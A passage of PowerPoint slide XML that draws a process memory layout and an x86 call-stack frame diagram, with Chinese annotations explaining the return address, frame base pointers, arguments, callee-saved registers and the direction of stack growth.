                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB6EF9E7-D8CA-42EA-8F04-0A72B2DC2C4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4425465" y="3822949"/>
              <a:ext cx="804735" cy="274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dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x08048000</a:t>
              </a:r>
              <a:endParaRPr sz="1000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Shape 640">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F439CA21-0597-4F22-B2FB-6FA62FC0A2F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4352868" y="838641"/>
              <a:ext cx="544012" cy="5173"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Shape 641">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{490D38B7-5B57-4CE3-BEF1-9DA0FDF3CDB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4352868" y="1283837"/>
              <a:ext cx="544013" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Shape 642">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FDD48CE-1482-44DD-8B3A-27C8B405049C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4366925" y="2601348"/>
              <a:ext cx="537319" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Shape 643">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C4D0B06-2118-4FBA-9B09-762A82F602F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4366925" y="4013255"/>
              <a:ext cx="529955" cy="2987"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="24" name="Shape 644">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEE5EE29-2C2E-4EA6-8927-6E71BBF32803}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4365261" y="4294670"/>
              <a:ext cx="530624" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Shape 645">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C11CC6DC-A3DB-4291-A964-A238B45F1583}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4425465" y="4101550"/>
              <a:ext cx="804735" cy="274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dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x00000000</a:t>
              </a:r>
              <a:endParaRPr sz="1000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Shape 646">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7CB832-764E-40AB-900B-B861E0BD1FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3516298" y="65662"/>
            <a:ext cx="4437285" cy="2287059"/>
            <a:chOff x="1182641" y="1372718"/>
            <a:chExt cx="5917268" cy="1830547"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Shape 651">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31247669-7D1B-470A-9AF3-2019B064D6EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1270710" y="3104433"/>
              <a:ext cx="3126708" cy="95767"/>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800" dirty="0"/>
                <a:t>……</a:t>
              </a:r>
              <a:endParaRPr sz="800" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="52" name="Shape 654">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3833B389-16C1-4C68-BDDD-36C316D61F60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4274389" y="3199846"/>
              <a:ext cx="2825520" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Shape 657">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C03BB1-2D5B-432D-9C8B-FF41D45CAF0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1182641" y="1372718"/>
              <a:ext cx="107131" cy="1830547"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 16272"/>
                <a:gd name="adj2" fmla="val 32726"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="0070C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5" name="Shape 650">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1FADA87-EA25-4603-8E9C-75CD2FA06D1F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1270709" y="3048822"/>
              <a:ext cx="3126709" cy="109466"/>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t>c</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1100" dirty="0"/>
                <a:t>allee’s local variables</a:t>
              </a:r>
              <a:endParaRPr sz="1100" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Shape 649">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE97FDB-9169-41E3-9D49-4E9C5D070627}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1270717" y="2654325"/>
              <a:ext cx="3126709" cy="39858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t>callee saved registers</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>1.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="700" b="1" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>用于保存应在每次调用中保留的长寿命</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>数据</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>被调用者有责任在返回调用者之前保存、恢复或者不碰这些寄存器中存放的数据</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Shape 620">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E56FC6D5-5F4B-4747-B6B0-F48829AFEF8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1270713" y="2419991"/>
              <a:ext cx="3126713" cy="240433"/>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100" dirty="0"/>
                <a:t>callee-stack frame base </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>存放的是</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>caller</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="700" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>栈帧的基地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 648">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5106FAAA-9305-48BB-9A2A-2BB0C526B34A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1270718" y="2207140"/>
              <a:ext cx="3126701" cy="225431"/>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100" dirty="0"/>
                <a:t>callee’s </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1100" dirty="0"/>
                <a:t>return address</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>callee</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>执行结束后返回</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>caller</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>内下一条指令的地址</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Shape 647">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CF4EFA7-A75C-4F33-B2E5-138EA4030E17}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1271609" y="2010389"/>
              <a:ext cx="3125809" cy="218564"/>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100" dirty="0"/>
                <a:t>callee’s </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0"/>
                <a:t>a</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1100" dirty="0"/>
                <a:t>rguments</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(callee</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>参数</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr sz="700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Shape 621">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5B7790F-4ED8-4A24-92B5-F70992CC2A2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1270138" y="1375788"/>
              <a:ext cx="3125523" cy="232035"/>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en-US" altLang="zh-CN" sz="1100" dirty="0"/>
                <a:t>caller-stack frame base</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>存放的是</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>caller’s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>caller</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="700" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>栈帧的基地址</a:t>
              </a:r>
              <a:endParaRPr sz="700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="49" name="Shape 656">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ACCC7B8-E658-467F-A99A-0B3533A066FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4274390" y="2662511"/>
              <a:ext cx="2428398" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="文本框 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39AD97C7-CDB0-4265-943A-6A92AD71B589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2995172" y="1102359"/>
            <a:ext cx="521133" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以此箭头方向拓展</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="118" name="组合 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2883664E-77B7-44F2-9583-892FD231ECF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1289365" y="952160"/>
            <a:ext cx="732655" cy="965378"/>
            <a:chOff x="1660871" y="946977"/>
            <a:chExt cx="671639" cy="989086"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="文本框 99">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C668C64-F4AE-4D6D-B628-E63B54BAE7F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1660871" y="1628286"/>
              <a:ext cx="671639" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>栈顶</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="101" name="文本框 100">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E997A04-B1C9-45A0-B40A-7D6E235C8CAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1660871" y="946977"/>
              <a:ext cx="671639" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>栈尾</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="文本框 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4CA79AC-3695-4683-A074-7E44309D841C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2995172" y="3886598"/>
            <a:ext cx="442765" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以此箭头方向拓展</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
